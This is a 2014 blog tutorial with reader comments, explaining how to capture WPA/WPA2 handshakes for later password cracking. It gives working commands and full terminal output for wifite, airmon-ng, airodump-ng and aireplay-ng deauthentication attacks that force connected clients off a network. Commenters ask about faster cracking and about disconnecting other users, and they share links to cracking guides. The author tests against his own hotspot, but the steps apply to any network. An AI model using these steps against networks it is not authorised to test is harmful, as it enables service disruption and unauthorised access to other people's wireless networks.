Friday, June 13, 2014

Hack WPA/WPA2 PSK Capturing the Handshake

 WPA password hacking


Okay, so hacking WPA-2 PSK involves 2 main steps-
  1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
  2. Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there's no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we'll match the hash we created with the one that's there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I'll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:
  1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
  2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
  3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
  4. The STA sends a confirmation to the AP.
All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)
  1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
  2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example, the RSN IE or the GTK)
  3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
  4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
  5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.


 By the way, if you didn't understand much of it then don't worry. There's a reason why people don't  search for hacking tutorials on Wikipedia (half the stuff goes above the head)

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We'll look at them one by one-
  1. Wifite (easy and automatic)
  2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)

Wifite

Methodology

We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don't mention this, I will (such a good guy I am :) ). Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but  wifite does all this crap for you, and in case of airodump-ng, you'll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named 'me' protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \     


 [+] scanning for wireless devices...
 [+] enabling monitor mode on wlan0... done
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:04] scanning wireless networks. 0 targets and 0 clients found

 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  57db   wps
    2  *******              11  WEP   21db    no   client
    3  **************   11  WEP   21db    no

Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we'll forget that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target,  i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here's what happened.
[+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:08:05] listening for handshake...             
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] disabling monitor mode on mon0... done
 [+] quitting

Now I connected my other PC to 'me'. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what happens this time around.


   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  *    1  WPA   99db    no   client
    2  me  1 WPA2  47db   wps   client
    3  *    11  WEP   22db    no   clients
    4  *   11  WEP   20db    no

 [+] select target numbers (1-4) separated by commas, or 'all': 2
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:51] listening for handshake...             
 (^C) WPA handshake capture interrupted
 [+] 2 attacks completed:
 [+] 0/2 WPA attacks succeeded
 [+] quitting


Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn't working. So time to bring my external card to the scene.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
           /       \     


 [+] scanning for wireless devices...
 [+] available wireless devices:
  1. wlan1        Ralink RT2870/3070    rt2800usb - [phy1]
  2. wlan0        Atheros     ath9k - [phy0]
 [+] select number of device to put into monitor mode (1-2):


See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  44db   wps   client
    2  *                       11  WEP   16db    no   client
    3  *                         11  WEP   16db    no

 [+] select target numbers (1-3) separated by commas, or 'all':
Now I attack the target. This time, finally, I captured a handshake.
 [+] 1 target selected.
 [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
 (^C) WPS brute-force attack interrupted
 [0:08:20] starting wpa handshake capture on "me"
 [0:07:23] listening for handshake...             
 [0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap"
 [+] 2 attacks completed:
 [+] 1/2 WPA attacks succeeded
        me (02:73:8D:37:A7:ED) handshake captured
        saved as hs/me_02-73-8D-**-**-**.cap

 [+] starting WPA cracker on 1 handshake
 [!] no WPA dictionary found! use -dict <file> command-line argument
 [+] disabling monitor mode on mon0... done
 [+] quitting
As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is defualt). The no dictionary error shouldn't bother you. We'll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the same thing with airodump-ng. This time I won't show you the problems you might run into. It'll be a perfect ride, all the problems were seen in wifite case.



Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I'll end this pretty quick, as the wifite thing was quite detailed. I'm copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see root@kali in red)

1. Find out the name of your wireless adapter.



Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
  • lo - loopback. Not important currently.
  • eth - ethernet
  • wlan - This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.


Trouble with the wlan interface not showing up. This is because virtual machines can't use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type 
airmon-ng start wlan0
 Your mon0 interface will be created.



3. Start capturing packets

Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack.
airodump-ng mon0

4. Store the captured packets in a file 

This can be achieved by giving some more parameters with the airodump command
airodump-ng mon0 --write name_of_file


Non newbies-
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

 Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng

 root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0

The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add --ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It's a bug with aircrack-ng suite).

Now when you look at the airodump-ng screen, you'll see that at the top right it says WPA handshake captured . Here is what it looks like
 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **                                 
                                                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                             
 02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me                                                                
                                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                   
                                                                                                                                             
 *                     *                            0    0e- 1    742       82  me                                                                       
*                       *                           -35  0e- 1      0   26                                                                                   

You can confirm it by typing the following
root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
   #  BSSID              ESSID                     Encryption
   1  **************  me                        WPA (1 handshake)
   2  **                          Unknown



Happy cracking, all that needs to be done in this tutorial has been done. Its been a long one. Hope it helped you. The next tutorial, if you need it, is about cracking the captured handshake. Good luck.

38 comments:

  1. I'm visiting your site for the first time, and I found this to be a very good tutorial. Good job for all the explanation, and giving hints on what else to look up on Wikipedia/Google to gain a greater understanding. Keep up the great work as I go through your other posts! Thank you. -Student

    ReplyDelete
    Replies
    1. Thanks for the appreciation. Keeps me motivated and helps me write better tutorials.

      Delete
  2. Hello shashwat, How can i increase my cracking speed using my NVIDIA graphic card

    ReplyDelete
    Replies
    1. I am writing a tutorial on this soon... I have been busy for the year but now I have time at hand.

      Delete
    2. hashcat can do this, here is a tutorial on that:
      https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcat-kali-linux/

      Delete
  3. keep writing !
    very good articles !

    ReplyDelete
  4. It was such a brilliant approach. I would like to know how to convert .cap to .hccap and cracking it with pyrit, aircrack-ng and hashcat without dictionary or password list?

    ReplyDelete
    Replies
    1. look at those two sites:
      1. https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcat-kali-linux/
      2. https://www.blackmoreops.com/2014/03/10/cracking-wifi-wpawpa2-passwords-using-pyrit-cowpatty/
      There is a good explanation. This approach uses neither wordlists nor brute force, but i haven't really read it yet, so I don't know how effective it is:
      http://null-byte.wonderhowto.com/forum/kali-linux-rolling-2-0-fluxion-crack-wpa-wpa2-wifi-password-without-dictionary-brute-fore-attack-0170864/

      Delete
  5. [#] Drone Hijacking With Maldrone — Drone Malware

    http://beinghaxor.blogspot.com/2015/05/drone-hijacking-with-maldrone-drone.html

    ReplyDelete
  6. Thank You. These tutorials are Great. Keep writing.

    ReplyDelete
  7. You had it well explained but since you used the aircrack suite
    1-You should disclose where the caphs-01cap is stored
    2-show the command for the use of aircrack to crack the password
    3-Or disclose other program run to do the final crack

    ReplyDelete
  8. I just want to say that this is a very good tutorial :)

    ReplyDelete
  9. Very good tutorial...keep it up bro.

    ReplyDelete
  10. I found this page by searching success/ttl as i wanted to find out what ttl stood for? isit time to live? or what?

    ReplyDelete
    Replies
    1. "Time to live" haha. It means "total"

      Delete
  11. Does using Live USB enable the internal wireless card enable it to inject packets easier to establish the handshakes or does the computer/laptop need to have an external wireless card to inject packets to get the handshake, regardless of using the Live USB?

    ReplyDelete
    Replies
    1. depends. But in nearly all cases, an external card is better than the internal one (especially in regard on performance an compatibility) an only costs like 15$, so it's worth a try

      Delete
  12. everything is good Except Capturing that handshaking packet.. .. the problem is .. it takes too much time to capture that packet..!! is there any way to do it fast?

    ReplyDelete
    Replies
    1. normally, it should only take seconds. If it takes a long time, there might be something wrong. If your using wifite, there is a bug I explained in reply to a comment from May 25, 2016 at 11:34 PM, just look down the page

      Delete
  13. Everytime i use airodump no devices show up underneath BSSID, i have installed a wireless card as i am running kali linux on a virtual machine. Is there a way to fix this as i know there are devices on my network, and another network i am running using a wireless receiver. I just used wifite to see if anything different would happen and nothing. The other day i left airodump on for 6 hours scanning and nothing appeared. Any ideas on what to do?

    ReplyDelete
    Replies
    1. There could be some issues with channel hopping. Try and set channels manually to 1,6,11 and see if anything shows up.

      Delete
    2. Try ifconfig and see if your wifi-card shows up. If it doesn't, it's maybe incompatible

      Delete
  14. very nice man best one iv seen and iv been looking at this kind of stuff for 8 years

    ReplyDelete
  15. I was testing on my own network, i got the handshake with # wifite -mac -aircrack -dict

    For some reason wifite wont find the wordlist file... ok, then i did # aircrack-ng <.cap> -w (also tried the -a 2 option)
    but it just wont pick the password... There is just one entery (9 carecters) and it just says that the password isnt in the wordlist... I even tried Crunch with given letters and let it do its thing for like 13 minutes and im sure it passed the correct one and still it wont pick it up... is there something wrong with the handshake file?

    ReplyDelete
  16. Hi ,SHASHWAT CHAUDHARY

    As you said, "you can force the already connected clients to disconnect".

    How can i do that? thanks.

    ReplyDelete
    Replies
    1. Search on google for the term Deauthentication (add wireless hacking to get more specific results).

      Delete
    2. Also, wifite does that automatically after selecting the network. Or you can do it manually with aireplay:
      aireplay-ng —deauth 0 -a BSSID CARD
      (replace BSSID and CARD with the one that you use)

      Delete
  17. Wifite not able to capture any handshake....
    Can you help me with it ??
    also i need to talk to you...
    Please leave a comment how can I connect to you ?

    ReplyDelete
    Replies
    1. In General > Contact Us, the following mailadress is given: admin@kalitutorials.net
      In the new version of Kali (2.0) wich you are most likely using, Wifite has a bug because of wich capturing the handshake fails. In the newest version of wifite this is fixed, but in Kali, the update-function of Wifite (wifite --update i think) won't find the newest version. Solutions are shown on this site for example: http://www.rootsh3ll.com/2015/10/rwsps-automated-wifi-wep-wpa2-wps-cracking-ch4/ . You will basically just have to update manually.

      Delete
  18. is there a way for us to decrypt the captured file from our handshake? well dictionary attacks are not that good not unless you have all the combinations of ASCII words in one list or so, Crunch will eat your box's resources if we will use it for that kind of attack as well.

    Is it possible?

    ReplyDelete
    Replies
    1. I recommend to read this article about hashcat: https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcat-kali-linux/ and this one about Pyrite and Cowpatty: https://www.blackmoreops.com/2014/03/10/cracking-wifi-wpawpa2-passwords-using-pyrit-cowpatty/.
      They are both really good written and can save you some time when it comes to decrypting.
      But what you might have thought of is this: http://null-byte.wonderhowto.com/forum/kali-linux-rolling-2-0-fluxion-crack-wpa-wpa2-wifi-password-without-dictionary-brute-fore-attack-0170864/
      It's author claims to crack the password without brute force/Dictionary. I haven't really looked at it yet, so no guarantee this works.

      Delete
  19. Cracking wifi using aircrack-ng.
    https://codeminds.org/2016/06/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng.html

    ReplyDelete
  20. some time wpa hanshake not found so how to solve this problems

    ReplyDelete
  21. This site is amazing. However, i've installed kali linux on the hard-drive of a windows vista machine. The wireless adapter is a broadcom bcm4311 802.11b/g. I've used both wifite and airmon-ng/airreplay-ng and on both, i watch my other machine (a chromebook) disconnect due to the deauth broadcast. But when it reconnects right away, neither airmon nor wifite capture the handshake. I've got all three devices (2 computers and router) in the same room. Could there be a setting i'm missing? Or maybe my Wireless Adapter isnt compatible? What could be the issue here? There's no error it just keeps cycling trying to deauthenticate and capture the handshake.

    ReplyDelete
    Replies
    1. Little more information: When i use the command airmon-ng start wlan0 to start the monitoring interface, it shows the interface, says the driver is b43, and under chipset, it says "non-mac80211 device? (report this!). Idk if that has anything to do with it?

      Delete
  22. i already got handshake, and capturing key from fake ap. but in Wifi Information : bash: /tmp/TMPflux/handcheck: Permission denied

    i tried to input (the right key of wifi that i attacked) from 192.168.1.1 in my browser, but the key not shown for final KEY FOUND by fluxion. as i did first time.

    anyone can help?

    thanks for answer

    ReplyDelete
    Replies
    1. I don't know why you have written a comment about Fluxion here. Anyways, I'm not able to understand exactly what is going on, so could you follow the steps that I have shown in the Fluxion tutorial, and then tell exactly where you are facing issues (and comment on that post itself, not here).

      Delete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC